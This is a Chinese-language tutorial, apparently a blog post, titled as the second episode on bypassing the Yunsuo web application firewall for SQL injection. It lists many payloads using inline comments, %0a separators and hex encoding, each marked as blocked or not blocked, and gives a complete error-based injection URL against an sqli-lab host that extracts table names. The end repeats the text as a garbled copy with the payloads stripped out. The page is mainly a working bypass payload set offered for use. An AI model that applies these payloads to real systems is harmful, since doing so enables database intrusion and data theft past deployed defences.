bypass云锁注入第二集
字数 534 2025-08-20 18:17:53

Bypass云锁注入技术详解(第二集)

实验环境

  • PHP版本:5.4.5
  • Web服务器:Apache
  • WAF:云锁win_3.1.18.13(最新版)
  • 靶机:sqli-lab

联合注入绕过技术

order by绕过

云锁对order by有拦截,但可通过以下方式绕过:

/*!30000order*//*!30000by*/ 1  -- 不拦截
/*!40000/*!30000order*//*!40000/*!30000by*/ 1  -- 不拦截

union select绕过

/*!40000/*!30000union*/ /*!40000/*!30000all*/ /*!40000 /*!30000select*/1,2,3  -- 不拦截

系统函数绕过

云锁未拦截系统函数调用,但提供以下常用绕过方式:

user/*!40000*/()
database%0a()
version/**/()
vsersion/*!()*/

报错注入绕过技术

绕过报错函数

测试发现updatexml函数与括号连接时会被拦截:

updatexml()  -- 拦截
updatexml/*!40000()*/  -- 不拦截
updatexml/*!40000*/()  -- 不拦截
/*!40000updatexml*/()  -- 不拦截
/*!40000/*!30000updatexml*/()  -- 不拦截

绕过系统函数

database()  -- 拦截
database/*!40000*/()  -- 不拦截

数据查询绕过

select被拦截时,可使用以下方式:

/*!30000select*/  -- 不拦截
/*!30000%53elect*/  -- 不拦截(十六进制编码)

完整Payload示例

http://192.168.1.10/sql/Less-1/?id=1' and updatexml/*!40000*/(1,concat(0x7e,(/*!30000select*/ %0agroup_concat(table_name) from%0ainformation_schema.tables%0awhere%0atable_schema="security"),0x7e),1)-- -

总结

  1. 云锁免费版对SQL注入的防护相对较弱
  2. 主要绕过技术包括:
    • 使用内联注释/*!xxxxx*/
    • 使用换行符%0a分隔关键字
    • 对关键字进行十六进制编码
    • 在函数名和括号之间插入特殊字符
  3. POST请求使用脏数据绕过可能更简单

注意事项

  1. 最新版云锁可能已修复部分绕过方式(如内联注释)
  2. 实际测试中需根据具体环境调整绕过技术
  3. 建议测试宝塔等其他WAF的绕过技术

评论反馈

  1. 有用户反馈最新版云锁已检测/*!xxxxx内联注释
  2. 部分用户遇到绕过困难,可能与具体配置有关
  3. 有需求测试宝塔WAF的SQL注入绕过技术
Bypass云锁注入技术详解(第二集) 实验环境 PHP版本:5.4.5 Web服务器:Apache WAF:云锁win_ 3.1.18.13(最新版) 靶机:sqli-lab 联合注入绕过技术 order by绕过 云锁对 order by 有拦截,但可通过以下方式绕过: union select绕过 系统函数绕过 云锁未拦截系统函数调用,但提供以下常用绕过方式: 报错注入绕过技术 绕过报错函数 测试发现 updatexml 函数与括号连接时会被拦截: 绕过系统函数 数据查询绕过 当 select 被拦截时,可使用以下方式: 完整Payload示例 总结 云锁免费版对SQL注入的防护相对较弱 主要绕过技术包括: 使用内联注释 /*!xxxxx*/ 使用换行符 %0a 分隔关键字 对关键字进行十六进制编码 在函数名和括号之间插入特殊字符 POST请求使用脏数据绕过可能更简单 注意事项 最新版云锁可能已修复部分绕过方式(如内联注释) 实际测试中需根据具体环境调整绕过技术 建议测试宝塔等其他WAF的绕过技术 评论反馈 有用户反馈最新版云锁已检测 /*!xxxxx 内联注释 部分用户遇到绕过困难,可能与具体配置有关 有需求测试宝塔WAF的SQL注入绕过技术